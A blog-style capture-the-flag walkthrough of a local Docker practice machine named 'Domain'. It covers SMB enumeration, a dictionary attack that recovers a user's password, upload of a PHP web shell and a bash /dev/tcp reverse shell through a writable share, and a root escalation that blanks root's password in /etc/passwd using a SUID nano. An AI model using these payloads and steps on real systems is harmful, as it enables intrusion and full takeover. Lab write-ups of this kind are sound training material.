DOMAIN MACHINE

┌──(root㉿kali)-[/home/kali/Descargas]
└─# bash auto_deploy.sh domain.tar

Estamos desplegando la máquina vulnerable, espere un momento.

Máquina desplegada, su dirección IP es --> 172.17.0.2

Presiona Ctrl+C cuando termines con la máquina para eliminarla

Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed port 80 (HTTP), 445 (SMB) and 139 (SMB) was open.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -n -Pn -p- --min-rate 5000 -sV -sS -vvv 172.17.0.2 2>/dev/null
[sudo] contraseña para kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-27 11:28 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 11:28
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 11:28, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:28
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Discovered open port 139/tcp on 172.17.0.2
Discovered open port 445/tcp on 172.17.0.2
Completed SYN Stealth Scan at 11:28, 0.64s elapsed (65535 total ports)
Initiating Service scan at 11:28
Scanning 3 services on 172.17.0.2
Completed Service scan at 11:28, 11.02s elapsed (3 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000030s latency).
Scanned at 2025-12-27 11:28:04 CET for 12s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.52 ((Ubuntu))
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4
MAC Address: 02:42:AC:11:00:02 (Unknown)

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Now, we have to execute this command to identify domain as you can see below.

┌──(kali㉿kali)-[~]
└─$ sudo netexec smb 172.17.0.2
SMB 172.17.0.2 445 2CD1877F9EDF [*] Unix - Samba (name:2CD1877F9EDF) (domain:2CD1877F9EDF) (signing:False) (SMBv1:False)

In addition, we must write /etc/hosts to obtain iformation about domain.
┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
172.17.0.2 75FBC149F26E
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Now, we should execute this toolkit to discover information over website as you can see below but we don't discover nothing.
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u "http://172.17.0.2/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x bak,txt,xml,php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php,bak,txt,xml
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 275]
Progress: 1102785 / 1102785 (100.00%)
===============================================================
Finished
===============================================================

In addition, we have to execute this toolkit and we will get many information about domain such as (users, folders etc) as you can see below.
┌──(kali㉿kali)-[~]
└─$ sudo enum4linux -a 172.17.0.2
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Dec 27 11:33:24 2025

=========================================( Target Information )=========================================

Target ........... 172.17.0.2
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=============================( Enumerating Workgroup/Domain on 172.17.0.2 )=============================

[E] Can't find workgroup/domain

=================================( Nbtstat Information for 172.17.0.2 )=================================

Looking up status of 172.17.0.2
No reply from 172.17.0.2

====================================( Session Check on 172.17.0.2 )====================================


[+] Server 172.17.0.2 allows sessions using username '', password ''


=================================( Getting domain SID for 172.17.0.2 )=================================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


====================================( OS information on 172.17.0.2 )====================================


[E] Can't get OS info with smbclient


[+] Got OS info for 172.17.0.2 from srvinfo:
2CD1877F9EDF Wk Sv PrQ Unx NT SNT 2cd1877f9edf server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03

========================================( Users on 172.17.0.2 )========================================

index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: james Name: james Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: bob Name: bob Desc:

user:[james] rid:[0x3e8]
user:[bob] rid:[0x3e9]

==================================( Share Enumeration on 172.17.0.2 )==================================

smbXcli_negprot_smb1_done: No compatible protocol selected by server.

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
html Disk HTML Share
IPC$ IPC IPC Service (2cd1877f9edf server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 172.17.0.2 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 172.17.0.2

//172.17.0.2/print$ Mapping: DENIED Listing: N/A Writing: N/A
//172.17.0.2/html Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//172.17.0.2/IPC$ Mapping: N/A Listing: N/A Writing: N/A

=============================( Password Policy Information for 172.17.0.2 )=============================

Password:

[+] Attaching to 172.17.0.2 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

[+] 2CD1877F9EDF
[+] Builtin

[+] Password Info for Domain: 2CD1877F9EDF

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 136 years 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 136 years 37 days 6 hours 21 minutes

[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 5

========================================( Groups on 172.17.0.2 )========================================


[+] Getting builtin groups:


[+] Getting builtin group memberships:


[+] Getting local groups:


[+] Getting local group memberships:


[+] Getting domain groups:


[+] Getting domain group memberships:


===================( Users on 172.17.0.2 via RID cycling (RIDS: 500-550,1000-1050) )===================


[I] Found new SID:
S-1-22-1

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-1843279340-185366406-368055819 and logon username '', password ''

S-1-5-21-1843279340-185366406-368055819-501 2CD1877F9EDF\nobody (Local User)
S-1-5-21-1843279340-185366406-368055819-513 2CD1877F9EDF\None (Domain Group)
S-1-5-21-1843279340-185366406-368055819-1000 2CD1877F9EDF\james (Local User)
S-1-5-21-1843279340-185366406-368055819-1001 2CD1877F9EDF\bob (Local User)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\bob (Local User)
S-1-22-1-1001 Unix User\james (Local User)

================================( Getting printer info for 172.17.0.2 )================================
No printers returned.

enum4linux complete on Sat Dec 27 11:34:11 2025

Now, we can execute the next command and obtain the same like to the other command which is enum4linux as you can see below.
┌──(kali㉿kali)-[~]
└─$ sudo rpcclient -U "" -N 172.17.0.2
rpcclient $> srvinfo
2CD1877F9EDF Wk Sv PrQ Unx NT SNT 2cd1877f9edf server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
rpcclient $> enumdomusers
user:[james] rid:[0x3e8]
user:[bob] rid:[0x3e9]
rpcclient $>

If we try use hydra, we won't obtain nothing as you can see below.
┌──(kali㉿kali)-[~]
└─$ hydra -l "bob" -P /usr/share/wordlists/rockyou.txt smb://172.17.0.2
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-27 11:39:11
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://172.17.0.2:445/
[ERROR] target smb://172.17.0.2:445/ does not support SMBv1

If we try use hydra, we won't obtain nothing as you can see below.
┌──(kali㉿kali)-[~]
└─$ hydra -l "james" -P /usr/share/wordlists/rockyou.txt smb://172.17.0.2
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-27 11:39:40
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://172.17.0.2:445/
[ERROR] target smb://172.17.0.2:445/ does not support SMBv1

Now, we have to try use the next command with the password spraying as you can see below but there haven't had luck.
┌──(kali㉿kali)-[~]
└─$ sudo netexec smb 172.17.0.2 -u bob -p bob
SMB 172.17.0.2 445 2CD1877F9EDF [*] Unix - Samba (name:2CD1877F9EDF) (domain:2CD1877F9EDF) (signing:False) (SMBv1:False)
SMB 172.17.0.2 445 2CD1877F9EDF [-] 2CD1877F9EDF\bob:bob STATUS_LOGON_FAILURE
Now, we have to try use the next command with the password spraying as you can see below but there haven't had luck with the other user.
┌──(kali㉿kali)-[~]
└─$ sudo netexec smb 172.17.0.2 -u bob -p james
SMB 172.17.0.2 445 2CD1877F9EDF [*] Unix - Samba (name:2CD1877F9EDF) (domain:2CD1877F9EDF) (signing:False) (SMBv1:False)
SMB 172.17.0.2 445 2CD1877F9EDF [-] 2CD1877F9EDF\bob:james STATUS_LOGON_FAILURE

Now, let's go to execute dictionary attack as you can see below and we have had luck.
┌──(kali㉿kali)-[~]
└─$ sudo netexec smb 172.17.0.2 -u bob -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding

SMB 172.17.0.2 445 2CD1877F9EDF [+] 2CD1877F9EDF\bob:star

In addition, as we have discovered password we can try listing things as you can see below.

┌──(kali㉿kali)-[~]
└─$ sudo netexec smb 172.17.0.2 -u bob -p star --shares
SMB 172.17.0.2 445 2CD1877F9EDF [*] Unix - Samba (name:2CD1877F9EDF) (domain:2CD1877F9EDF) (signing:False) (SMBv1:False)
SMB 172.17.0.2 445 2CD1877F9EDF [+] 2CD1877F9EDF\bob:star
SMB 172.17.0.2 445 2CD1877F9EDF [*] Enumerated shares
SMB 172.17.0.2 445 2CD1877F9EDF Share Permissions Remark
SMB 172.17.0.2 445 2CD1877F9EDF ----- ----------- ------
SMB 172.17.0.2 445 2CD1877F9EDF print$ READ Printer Drivers
SMB 172.17.0.2 445 2CD1877F9EDF html READ,WRITE HTML Share
SMB 172.17.0.2 445 2CD1877F9EDF IPC$ IPC Service (2cd1877f9edf server (Samba, Ubuntu))

In addition, as we have discovered password we can try listing prints with print$ as you can see below.

┌──(kali㉿kali)-[~]
└─$ sudo smbclient //172.17.0.2/print$ -U bob
Password for [WORKGROUP\bob]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Apr 11 10:05:42 2024
.. D 0 Thu Apr 11 10:05:42 2024
W32ALPHA D 0 Fri Jan 5 22:23:01 2024
color D 0 Thu Apr 11 10:05:42 2024
W32PPC D 0 Fri Jan 5 22:23:01 2024
ARM64 D 0 Thu Apr 11 10:05:42 2024
x64 D 0 Thu Apr 11 10:05:42 2024
W32X86 D 0 Thu Apr 11 10:05:42 2024
COLOR D 0 Fri Jan 5 22:23:01 2024
WIN40 D 0 Fri Jan 5 22:23:01 2024
W32MIPS D 0 Fri Jan 5 22:23:01 2024
IA64 D 0 Fri Jan 5 22:23:01 2024

24253528 blocks of size 1024. 690476 blocks available
smb: \>

In addition, as we have discovered password we can try listing nothing with IPC$ as you can see below.
┌──(kali㉿kali)-[~]
└─$ sudo smbclient //172.17.0.2/IPC$ -U bob
Password for [WORKGROUP\bob]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
smb: \>

In addition, as we have discovered password we can read and write with html as you can see below.
┌──(kali㉿kali)-[~]
└─$ sudo smbclient //172.17.0.2/html -U bob
Password for [WORKGROUP\bob]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Dec 27 11:44:19 2025
.. D 0 Thu Apr 11 10:18:47 2024
index.html N 1832 Thu Apr 11 10:21:43 2024

24253528 blocks of size 1024. 690472 blocks available
smb: \>

Now, we can create rce and try execute command as you can see below.
┌──(kali㉿kali)-[~]
└─$ sudo nano codigo.php
<?php system($_GET['cmd']); ?>

In addition, we can upload the rce with the command put codigo.php as you can see below.
┌──(kali㉿kali)-[~]
└─$ sudo smbclient //172.17.0.2/html -U bob
Password for [WORKGROUP\bob]:
Try "help" to get a list of possible commands.
smb: \> put codigo.php
putting file codigo.php as \codigo.php (7,8 kB/s) (average 7,8 kB/s)
smb: \> ls
. D 0 Sat Dec 27 11:55:41 2025
.. D 0 Thu Apr 11 10:18:47 2024
index.html N 1832 Thu Apr 11 10:21:43 2024
codigo.php A 32 Sat Dec 27 11:55:41 2025

24253528 blocks of size 1024. 682732 blocks available
smb: \>

http://172.17.0.2/codigo.php?cmd=whoami

http://172.17.0.2/codigo.php?cmd=/etc/passwd

Now, we can create reverse shell and try execute command as you can see below.

┌──(kali㉿kali)-[~]
└─$ sudo nano reverse.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.2/443 0>&1'")
?>php

In addition, we can upload the rce with the command put reverse.php as you can see below.
┌──(kali㉿kali)-[~]
└─$ sudo smbclient //172.17.0.2/html -U bob
Password for [WORKGROUP\bob]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Dec 27 11:55:41 2025
.. D 0 Thu Apr 11 10:18:47 2024
index.html N 1832 Thu Apr 11 10:21:43 2024
codigo.php A 32 Sat Dec 27 11:55:41 2025

24253528 blocks of size 1024. 675448 blocks available
smb: \> put reverse.php
putting file reverse.php as \reverse.php (24,7 kB/s) (average 24,7 kB/s)
smb: \> ls
. D 0 Sat Dec 27 12:01:10 2025
.. D 0 Thu Apr 11 10:18:47 2024
index.html N 1832 Thu Apr 11 10:21:43 2024
reverse.php A 76 Sat Dec 27 12:01:10 2025
codigo.php A 32 Sat Dec 27 11:55:41 2025

24253528 blocks of size 1024. 675408 blocks available
smb: \>

In addition, we have to open port as you can see below when we open file we will obtain the shell.

┌──(kali㉿kali)-[~]
└─$ nc -lvp 443
listening on [any] 443 ...
connect to [172.17.0.1] from 75FBC149F26E [172.17.0.2] 47530
bash: cannot set terminal process group (24): Inappropriate ioctl for device
bash: no job control in this shell
www-data@2cd1877f9edf:/var/www/html$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@2cd1877f9edf:/var/www/html$ ^Z
zsh: suspended nc -lvp 443

┌──(kali㉿kali)-[~]
└─$ stty raw -echo;fg
[1] + continued nc -lvp 443
reset xterm

www-data@2cd1877f9edf:/var/www/html$ export TERM=xterm
www-data@2cd1877f9edf:/var/www/html$ export SHELL=bash

www-data@2cd1877f9edf:/var/www/html$ sudo -l
bash: sudo: command not found
www-data@2cd1877f9edf:/var/www/html$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/passwd
/usr/bin/nano
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
www-data@2cd1877f9edf:/var/www/html$

We can see the we have perms to modify.
ls -la /usr/bin/passwd
-rwsr-xr-x 1 root root 59976 Feb 6 2024 /usr/bin/passwd
www-data@2cd1877f9edf:/var/www/html$ ls -al /etc/passwd
-rw-r--r-- 1 root root 1067 Apr 11 2024 /etc/passwd
www-data@2cd1877f9edf:/var/www/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
james:x:1001:1001:james,,,:/home/james:/bin/bash
www-data@2cd1877f9edf:/var/www/html$

As we have modified the user root we will be able to be root without introduce password.

www-data@2cd1877f9edf:/var/www/html$ cat /etc/passwd
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
james:x:1001:1001:james,,,:/home/james:/bin/bash
www-data@2cd1877f9edf:/var/www/html$
www-

Gotha! we have been root without password as you can see below.

data@2cd1877f9edf:/var/www/html$ su root
root@2cd1877f9edf:/var/www/html# whoami
root
root@2cd1877f9edf:/var/www/html#

Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Search This Blog

Hora actual en
Madrid, España

CYBERSECURITY

DOMAIN MACHINE

DOMAIN MACHINE

Comments

Post a Comment

Entradas Populares

INTERNAL

TOR WEB BROWSER

activedirectory

PICKLE RICK

Metasploit Framework

HOSTING

LOVE

CHANGE MACHINE